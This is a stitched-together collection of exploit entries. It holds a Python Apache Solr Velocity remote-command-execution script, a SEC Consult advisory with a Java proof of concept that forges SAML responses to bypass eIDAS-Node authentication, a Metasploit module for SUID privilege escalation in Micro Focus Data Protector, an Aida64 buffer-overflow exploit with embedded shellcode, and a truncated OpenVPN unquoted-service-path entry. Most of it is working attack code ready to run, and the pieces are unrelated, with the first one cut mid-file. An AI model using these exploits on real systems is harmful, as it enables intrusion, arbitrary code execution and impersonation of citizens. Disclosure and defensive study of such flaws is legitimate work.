    def get_nodes(self):
        payload = {
'_': self.timestamp,
'indexInfo': 'false',
'wt': 'json'
        }
        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/cores'

        try:
            nodes_info = requests.get(url, params=payload, timeout=5)
            node = list(nodes_info.json()['status'].keys())
            state = 1
        except:
            node = ''
            state = 0

        if node:
            return {
'node': node,
'state': state,
'msg': 'Get Nodes Successfully'
            }
        else:
            return {
'node': None,
'state': state,
'msg': 'Get Nodes Failed'
            }

    def get_system(self):
        payload = {
'_': self.timestamp,
'wt': 'json'
        }
        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/info/system'
        try:
            system_info = requests.get(url=url, params=payload, timeout=5)
            os_name = system_info.json()['system']['name']
            os_uname = system_info.json()['system']['uname']
            os_version = system_info.json()['system']['version']
            state = 1

        except:
            os_name = ''
            os_uname = ''
            os_version = ''
            state = 0

        return {
'system': {
'name': os_name,
'uname': os_uname,
'version': os_version,
'state': state
            }
        }


class apacheSolrRCE(object):

    def __init__(self, ip, port, node, command):
        self.ip = ip
        self.port = port
        self.node = node
        self.command = command
        self.url = "http://" + self.ip + ':' + self.port + '/solr/' + self.node

    def init_node_config(self):
        url = self.url + '/config'
        payload = {
'update-queryresponsewriter': {
'startup': 'lazy',
'name': 'velocity',
'class': 'solr.VelocityResponseWriter',
'template.base.dir': '',
'solr.resource.loader.enabled': 'true',
'params.resource.loader.enabled': 'true'
            }
        }
        try:
            res = requests.post(url=url, data=json.dumps(payload), timeout=5)
            if res.status_code == 200:
                return {
'init': 'Init node config successfully',
'state': 1
                }
            else:
                return {
'init': 'Init node config failed',
'state': 0
                }
        except:
            return {
'init': 'Init node config failed',
'state': 0
            }

    def rce(self):
        url = self.url + ("/select?q=1&&wt=velocity&v.template=custom&v.template.custom="
"%23set($x=%27%27)+"
"%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+"
"%23set($chr=$x.class.forName(%27java.lang.Character%27))+"
"%23set($str=$x.class.forName(%27java.lang.String%27))+"
"%23set($ex=$rt.getRuntime().exec(%27" + self.command +
"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+"
"%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end")
        try:
            res = requests.get(url=url, timeout=5)
            if res.status_code == 200:
                try:
                    if res.json()['responseHeader']['status'] == '0':
                        return 'RCE failed @Apache Solr node %s\n' % self.node
                    else:
                        return 'RCE failed @Apache Solr node %s\n' % self.node
                except:
                    return 'RCE Successfully @Apache Solr node %s\n %s\n' % (self.node, res.text.strip().strip('0'))

            else:
                return 'RCE failed @Apache Solr node %s\n' % self.node
        except:
            return 'RCE failed @Apache Solr node %s\n' % self.node


def check(ip, port='8983', command='whoami'):
    system = initSolr(ip=ip, port=port)
    if system.get_nodes()['state'] == 0:
        print('No Nodes Found. Remote Exec Failed!')
    else:
        nodes = system.get_nodes()['node']
        systeminfo = system.get_system()
        os_name = systeminfo['system']['name']
        os_version = systeminfo['system']['version']
        print('OS Realese: %s, OS Version: %s\nif remote exec failed, '
'you should change your command with right os platform\n' % (os_name, os_version))

        for node in nodes:
            res = apacheSolrRCE(ip=ip, port=port, node=node, command=command)
            init_node_config = res.init_node_config()
            if init_node_config['state'] == 1:
                print('Init node %s Successfully, exec command=%s' % (node, command))
                result = res.rce()
                print(result)
            else:
                print('Init node %s Failed, Remote Exec Failed\n' % node)


if __name__ == '__main__':
    usage = ('python3 script.py ip [port [command]]\n '
'\t\tdefault port=8983\n '
'\t\tdefault command=whoami')

    if len(sys.argv) == 4:
        ip = sys.argv[1]
        port = sys.argv[2]
        command = sys.argv[3]
        check(ip=ip, port=port, command=command)
    elif len(sys.argv) == 3:
        ip = sys.argv[1]
        port = sys.argv[2]
        check(ip=ip, port=port)
    elif len(sys.argv) == 2:
        ip = sys.argv[1]
        check(ip=ip)
    else:
        print('Usage: %s:\n' % usage)

SEC Consult Vulnerability Lab Security Advisory < 20191029-0 >
=======================================================================
              title: Authentication Bypass
            product: eIDAS-Node
 vulnerable version: <=v2.3 (v2.1 vulnerability #2)
      fixed version: v2.3.1
         CVE number: -
             impact: critical
           homepage: https://ec.europa.eu/cefdigital/wiki/display/CEFDIGITAL/eIDAS-Node+Integration+Package
              found: 2019-06
                 by: Wolfgang Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"The eIDAS-Node software is a sample implementation of the eID eIDAS Profile. It
was developed by the European Commission with the help of Member States
collaborating in the technical sub-committee of the eIDAS Expert Group. The
eIDAS-Node software contains the necessary modules to help Member States to
communicate with other eIDAS-compliant counterparts in a centralised or
distributed fashion."

URL: https://ec.europa.eu/cefdigital/wiki/display/CEFDIGITAL/eIDAS-Node+Integration+Package


Business recommendation:
------------------------
During a short crash test SEC Consult identified critical vulnerabilities in
the eIDAS-Node software component (EU cross-border authentication). These
vulnerabilities could allow an attacker to impersonate any EU citizen.

SEC Consult recommends to immediately apply the patch provided by the vendor,
if this has not happened yet.
Moreover, SEC Consult recommends operators of eIDAS-Node installations to
conduct a forensic investigation into whether this vulnerability has already
been abused.


Vulnerability overview/description:
-----------------------------------
The communication between eIDAS Member States (MS) is based on SAML. The
eIDAS node of an MS providing a service to citizens of another MS sends a
SAML AuthNRequest to an eIDAS node that is capable of authenticating the citizen
through her national authentication scheme (e.g. id card authentication).

After the citizen has successfully authenticated, a SAML response is sent to the
requesting eIDAS node. To verify the authenticity of the SAML response,
eIDAS-Node verifies its signature and checks whether the signing certificate
is trusted.

Vulnerability #1: Certificate Faking
The verification of the certificate trust is implemented as follows:
1. The certificate is accepted if it is in the local trust store
2. Otherwise the issuer certificate of the entity certificate is retrieved from
   either the local trust store or from the supplemental certificates in the
   SAML response.
3. If a trust path can be established between the issuer certificate and a
   certificate in the trust store, the entity certificate is accepted.

It was found that, in step 2, the application searches for the the issuer
certificate by comparing the Issuer DN of the entity certificate to the Subject
DN of the potential issuer certificates.

The application does not verify whether the entity certificate has been
correctly signed by the issuer certificate. Moreover, other checks, such as
whether the basic constraints of the issuer certificate allow it to act as a
certificate issuer are not verified.

An attacker can therefore sign a manipulated SAML response with a forged
certificate. The certificate must contain an Issuer DN that matches the subject
of  a certificate in the trust store. The subject must contain the country of
the citizen (e.g. CN=FAKE, C=AT).


Vulnerability #2: Missing Certificate Validation
At least version 2.1 of the software uses the OpenSAML class
ExplicitKeyTrustEvaluator to check whether the signer certificate is trusted.
The method validate(...) returns a boolean value indicating whether trust could
be established. However, eIDAS-Node does not check the return value and
continues processing the SAML response. As effectively, the certificate's trust
is not verified, an attacker can sign the SAML response with any certificate.

This advisory demonstrates vulnerabilities against the endpoint that processes
SAML responses. Other endpoints (e.g. the ones that process SAML requests) are
likely affected as well (this has only partly been verified).

NOTE: The version 2.1 is no longer supported in favor of the version 2.3.1.


Proof of concept:
-----------------
Vulnerability #1: Certificate Faking
The following Java class demonstrates the attack:

----- snip -----
package com.sec_consult.eidas_node.autologin;

import java.io.InputStream;
import java.math.BigInteger;
import java.net.URI;
import java.security.InvalidKeyException;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.cert.X509Certificate;
import java.util.Date;

import javax.annotation.Nonnull;
import javax.security.auth.x500.X500Principal;

import org.apache.commons.lang.RandomStringUtils;
import org.apache.xml.security.utils.EncryptionConstants;
import org.bouncycastle.x509.X509V3CertificateGenerator;
import org.opensaml.core.xml.config.XMLObjectProviderRegistrySupport;
import org.opensaml.saml.saml2.core.AuthnRequest;
import org.opensaml.saml.saml2.core.Response;
import org.opensaml.security.x509.BasicX509Credential;
import org.opensaml.security.x509.X509Credential;
import org.opensaml.xmlsec.signature.KeyInfo;
import org.opensaml.xmlsec.signature.Signature;
import org.opensaml.xmlsec.signature.support.SignatureConstants;
import org.opensaml.xmlsec.signature.support.Signer;

import eu.eidas.auth.commons.xml.opensaml.OpenSamlHelper;
import eu.eidas.auth.engine.core.impl.AbstractProtocolSigner;
import eu.eidas.auth.engine.xml.opensaml.CertificateUtil;
import eu.eidas.encryption.SAMLAuthnResponseEncrypter;
import eu.eidas.engine.exceptions.EIDASSAMLEngineException;

public class ResponseFaker {
  /**
   * Fake a response to an AuthnRequest
   *
   * @param request the request to be answered
   * @param encryptedResponse any original response (only needed
   *    to get a valid issuer and the encryption certificate)
   * @param sp the URL of the requesting SP
   * @param auth the target of the AuthnRequest
   */
  public String respondTo(String request, String encryptedResponse, URI sp,
      URI auth) throws Exception {
    AuthnRequest req = (AuthnRequest) OpenSamlHelper.unmarshall(request);
    Response originalResp = (Response) OpenSamlHelper
        .unmarshall(encryptedResponse);

    X509Certificate origSignCert = CertificateUtil.toCertificate(
        originalResp.getSignature().getKeyInfo().getX509Datas().get(0)
        .getX509Certificates().get(0).getValue());
    X509Certificate encCert = CertificateUtil.toCertificate(
        originalResp.getEncryptedAssertions().get(0)
        .getEncryptedData().getKeyInfo().getEncryptedKeys().get(0)
        .getKeyInfo().getX509Datas().get(0)
        .getX509Certificates().get(0).getValue());

    String country = CertificateUtil.getCountry(origSignCert);

    X500Principal subject = new X500Principal(
        String.format("CN=FAKE, C=%s", country));
    X500Principal issuer = origSignCert.getIssuerX500Principal();

    BasicX509Credential signCredentials = createSignCredentials(issuer,
        subject);

    return createResponse(req.getID(), encCert, signCredentials,
        sp.toString(), auth.toString(), country);
  }

  @SuppressWarnings("deprecation")
  private BasicX509Credential createSignCredentials(X500Principal issuerDn,
      X500Principal subjectDn) {
    try {
      KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
      kpg.initialize(1024);
      KeyPair keyPair = kpg.generateKeyPair();

      PublicKey publicKey = keyPair.getPublic();
      PrivateKey privateKey = keyPair.getPrivate();

      X509V3CertificateGenerator certGen =
          new X509V3CertificateGenerator();
      certGen.setSerialNumber(new BigInteger("123"));
      certGen.setIssuerDN(issuerDn);
      certGen.setSubjectDN(subjectDn);
      certGen.setNotBefore(new Date(0));
      certGen.setNotAfter(new Date(2099, 1, 1));
      certGen.setPublicKey(publicKey);
      certGen.setSignatureAlgorithm("SHA256WithRSA");

      return new BasicX509Credential(certGen.generate(privateKey),
          privateKey);
    } catch (Exception e) {
      throw new RuntimeException(e);
    }
  }

  private String createResponse(String inResponseTo,
      X509Certificate encCertificate,
      BasicX509Credential signCredentials, String spPrefix,
      String authPrefix, String country) throws Exception {
    String template;
    try (InputStream is = this.getClass().getClassLoader()
        .getResourceAsStream("template.xml")) {
      template = new String(is.readAllBytes());
    }

    template = template.replace("%SP_PREFIX%", spPrefix);
    template = template.replace("%AUTH_PREFIX%", authPrefix);
    template = template.replace("%COUNTRY%", country);

    Response response = (Response) OpenSamlHelper.unmarshall(template);
    response.setID(RandomStringUtils.randomAlphabetic(20));
    response.setInResponseTo(inResponseTo);

    SAMLAuthnResponseEncrypter sre = SAMLAuthnResponseEncrypter.builder()
        .dataEncryptionAlgorithm(
            EncryptionConstants.ALGO_ID_BLOCKCIPHER_AES256_GCM)
        .keyEncryptionAlgorithm(
            EncryptionConstants.ALGO_ID_KEYTRANSPORT_RSAOAEP)
        .build();

    response = sre.encryptSAMLResponse(response,
        new BasicX509Credential(encCertificate), true);

    Signature signature = createSignature(signCredentials, false);
    response.setSignature(signature);

    XMLObjectProviderRegistrySupport.getMarshallerFactory()
      .getMarshaller(response).marshall(response);

    Signer.signObject(signature);

    return new String(OpenSamlHelper.marshall(response));
  }

  // from
  // eu.eidas.auth.engine.core.impl.AbstractProtocolSigner
  // .createSignature(X509Credential, boolean)
  private Signature createSignature(@Nonnull X509Credential credential,
      boolean onlyKeyInfoNoCert)
      throws EIDASSAMLEngineException {
    Signature signature;

    signature = (Signature) XMLObjectProviderRegistrySupport
        .getBuilderFactory()
        .getBuilder(Signature.DEFAULT_ELEMENT_NAME)
        .buildObject(Signature.DEFAULT_ELEMENT_NAME);

    signature.setSigningCredential(credential);

    signature.setSignatureAlgorithm(
"http://www.w3.org/2001/04/xmldsig-more#rsa-sha512");

    KeyInfo keyInfo = AbstractProtocolSigner
        .createKeyInfo(credential, onlyKeyInfoNoCert);

    signature.setKeyInfo(keyInfo);
    signature.setCanonicalizationAlgorithm(
        SignatureConstants.ALGO_ID_C14N_EXCL_OMIT_COMMENTS);
    return signature;
  }
}
----- snip -----

The following SAML response was used as a template:

----- snip -----
<saml2p:Response
  xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
  xmlns:eidas="http://eidas.europa.eu/attributes/naturalperson"
  xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"
  xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"
  Consent="urn:oasis:names:tc:SAML:2.0:consent:obtained"
  Destination="%SP_PREFIX%/EidasNode/ColleagueResponse"
  ID="replace"
  InResponseTo="replace"
  IssueInstant="2000-01-01T00:00:00.000Z" Version="2.0">
<saml2:Issuer
    Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">
    %AUTH_PREFIX%/EidasNode/ServiceMetadata</saml2:Issuer>
<saml2p:Status>
<saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />
<saml2p:StatusMessage>
      urn:oasis:names:tc:SAML:2.0:status:Success
</saml2p:StatusMessage>
</saml2p:Status>
<saml2:Assertion
    xmlns:eidas-legal="http://eidas.europa.eu/attributes/legalperson"
    xmlns:eidas-natural="http://eidas.europa.eu/attributes/naturalperson"
    ID="test"
    IssueInstant="2000-01-01T00:00:00.000Z" Version="2.0">
<saml2:Issuer
      Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">
      %AUTH_PREFIX%/EidasNode/ServiceMetadata</saml2:Issuer>
<saml2:Subject>
<saml2:NameID
        Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"
        NameQualifier="http://C-PEPS.gov.xx">0123456</saml2:NameID>
<saml2:SubjectConfirmation
        Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml2:SubjectConfirmationData
          Address="0.0.0.0"
          NotOnOrAfter="2030-01-01T00:00:00.000Z"
          Recipient="%AUTH_PREFIX%/EidasNode/ColleagueResponse" />
</saml2:SubjectConfirmation>
</saml2:Subject>
<saml2:Conditions
      NotBefore="2000-01-01T00:00:00.000Z"
      NotOnOrAfter="2030-01-01T00:00:00.000Z">
<saml2:AudienceRestriction>
<saml2:Audience>
          %SP_PREFIX%/EidasNode/ConnectorMetadata
</saml2:Audience>
</saml2:AudienceRestriction>
</saml2:Conditions>
<saml2:AuthnStatement
      AuthnInstant="2000-01-01T00:00:00.000Z">
<saml2:AuthnContext>
<saml2:AuthnContextClassRef>
        http://eidas.europa.eu/LoA/high
</saml2:AuthnContextClassRef>
<saml2:AuthnContextDecl />
</saml2:AuthnContext>
</saml2:AuthnStatement>
<saml2:AttributeStatement>
<saml2:Attribute FriendlyName="LegalName"
        Name="http://eidas.europa.eu/attributes/legalperson/LegalName"
        NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:type="eidas-legal:LegalNameType">
            Johann Wolfgang von Goethe
</saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="LegalPersonIdentifier"
        Name="http://eidas.europa.eu/attributes/legalperson/LegalPersonIdentifier"
        NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:type="eidas-legal:LegalPersonIdentifierType">
            %COUNTRY%/%COUNTRY%/12345
</saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="FamilyName"
        Name="http://eidas.europa.eu/attributes/naturalperson/CurrentFamilyName"
        NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:type="eidas-natural:CurrentFamilyNameType">
            Goethe
</saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="FirstName"
        Name="http://eidas.europa.eu/attributes/naturalperson/CurrentGivenName"
        NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:type="eidas-natural:CurrentGivenNameType">
            Johann Wolfgang
</saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="DateOfBirth"
        Name="http://eidas.europa.eu/attributes/naturalperson/DateOfBirth"
        NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:type="eidas-natural:DateOfBirthType">
            1749-08-28
</saml2:AttributeValue>
</saml2:Attribute>
<saml2:Attribute FriendlyName="PersonIdentifier"
        Name="http://eidas.europa.eu/attributes/naturalperson/PersonIdentifier"
        NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml2:AttributeValue
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:type="eidas-natural:PersonIdentifierType">
            %COUNTRY%/%COUNTRY%/12345
</saml2:AttributeValue>
</saml2:Attribute>
</saml2:AttributeStatement>
</saml2:Assertion>
</saml2p:Response>
----- snip -----


Vulnerability #2: Missing Certificate Validation
The following listing shows an excerpt of the method
eu.eidas.auth.engine.xml.opensaml.CertificateUtil.checkExplicitTrust(...):

public static void checkExplicitTrust(...)
    throws CertificateException {
[...]
  final ExplicitKeyTrustEvaluator keyTrustEvaluator =
    new ExplicitKeyTrustEvaluator();

  keyTrustEvaluator.validate(
    entityX509Cred,
    (Iterable<Credential>) trustedCredentials);
}

As the return value of the validate method is not processed, any certificate
would be found valid. Therefore, with minor changes the exploit for
vulnerability #1 also works to exploit this scenario for version 2.1 (the
second parameter for sre.encryptSAMLResponse has to be set to false).


Vulnerable / tested versions:
-----------------------------
The version 2.3 was found to be vulnerable for vulnerability #1. This was the
latest version at the time of discovery.

Version 2.1 was found to be vulnerable to vulnerability #2.


Vendor contact timeline:
------------------------
2019-07-04: Contacting vendor through CEF-EID-SUPPORT AT ec.europa.eu
2019-07-09: Vendor asking for general information about vulnerability (affected
            branch and modules)
2019-07-10: Providing requested information
2019-07-15: Vendor provided S/MIME certificates
2019-07-16: Sending encrypted advisory
2019-07-25: Vendor confirmed vulnerabilities, patch planned for v2.3.1,
            vulnerability #2 has already been fixed before in v2.2
2019-08-01: Vendor: vulnerability was fixed, patch privately shared with
            affected parties, asked for postponing the release due to
            deployment timing in affected parties
2019-08-05: Asking for proposed new release date
2019-08-05: Vendor proposed 2019-09-20 as release date, SEC Consult proposed
            2019-09-24 as new date
2019-08-08: Vendor: v2.3.1 has been released privately to MS
2019-09-02: Informing CERT.at and CERT-Bund about the security issues
2019-09-09: Due to delays in deployment by affected parties, vendor proposes
            new release date of 2019-10-29
2019-10-16: Vendor confirms release date
2019-10-22: Sending preliminary blog post and advisory to vendor
2019-10-24: Conference call to discuss blog post and advisory with vendor
2019-10-29: Public release of the advisory


Solution:
---------
Upgrade to the latest version 2.3.1.

The updated version can be downloaded here:
https://ec.europa.eu/cefdigital/wiki/display/CEFDIGITAL/All+releases


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Wolfgang Ettlinger / @2019

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
'Description'    => %q{
        This module exploits the trusted `$PATH` environment
        variable of the SUID binary `omniresolve` in
        Micro Focus (HPE) Data Protector A.10.40 and prior.

        The `omniresolve` executable calls the `oracleasm` binary using
        a relative path and the trusted environment `$PATH`, which allows
        an attacker to execute a custom binary with `root` privileges.

        This module has been successfully tested on:
        HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)

        The vulnerability has been patched in:
        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
's7u55', # Discovery and Metasploit module
        ],
'DisclosureDate' => '2019-09-13',
'Platform'       => [ 'linux' ],
'Arch'           => [ ARCH_X86, ARCH_X64 ],
'SessionTypes'   => [ 'shell', 'meterpreter' ],
'Targets'        =>
        [
          [
'Micro Focus (HPE) Data Protector <= 10.40 build 118',
            upper_version: Gem::Version.new('10.40')
          ]
        ],
'DefaultOptions' =>
        {
'PrependSetgid' => true,
'PrependSetuid' => true
        },
'References'     =>
        [
          [ 'CVE', '2019-11660' ],
          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
        ]
    ))

    register_options(
      [
        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def suid_bin_path
    datastore['SUID_PATH'].to_s
  end

  def check
    unless setuid? suid_bin_path
      vprint_error("#{suid_bin_path} executable is not setuid")
      return CheckCode::Safe
    end

    info = cmd_exec("#{suid_bin_path} -ver").to_s
    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
      version = '%.2f' % $1.to_f
      build = $3.to_i
      vprint_status("omniresolve version #{version} build #{build}")

      unless Gem::Version.new(version) < target[:upper_version] ||
             (Gem::Version.new(version) == target[:upper_version] && build <= 118)
        return CheckCode::Safe
      end

      return CheckCode::Appears
    end

    vprint_error("Could not parse omniresolve -ver output")
    CheckCode::Detected
  end

  def exploit
    if check == CheckCode::Safe
      unless datastore['ForceExploit']
        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
      end
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    payload_path = File.join(base_dir, 'oracleasm')
    register_file_for_cleanup(payload_path)
    write_file(payload_path, generate_payload_exe)
    chmod(payload_path)

    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    register_file_for_cleanup(trigger_path)
    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
  end
end

# Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH)
# Date: 2019-10-28
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage: https://www.aida64.com
# Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE=
# Version: AIDA64 Enginner 6.10.5200
# Tested on: Windows 7 Home Basic SP1
# CVE : N/A

# Step
1) File -> Preferences -> Logging -> Log sensor readings to CSV log file
2) Paste payload from "aida64.txt" -> Apply
3) File -> Exit

# Exploit Code
#! Python

import struct

# shell code
buf =  ""
buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
buf += "\x76\x74\x33\x79\x76\x35\x41\x41"

# Exploit Payload
sehNext = struct.pack('<L',0x909010EB) # SHORT JMP
sehHandler = struct.pack('<L',0x0120c8b6) # POP POP RET

payload = 'A' * (1115 - 4)  + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000

f = open("aida64.txt", "wb")
f.write(payload)
f.close()

# Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-03
# Vendor Homepage: https://openvpn.net
# Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi
# Tested Version: 3.0.0.(272)
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path: 

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """

OpenVPN Agent agent_ovpnconnectagent_ovpnconnectC:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exeAuto

# Service info:

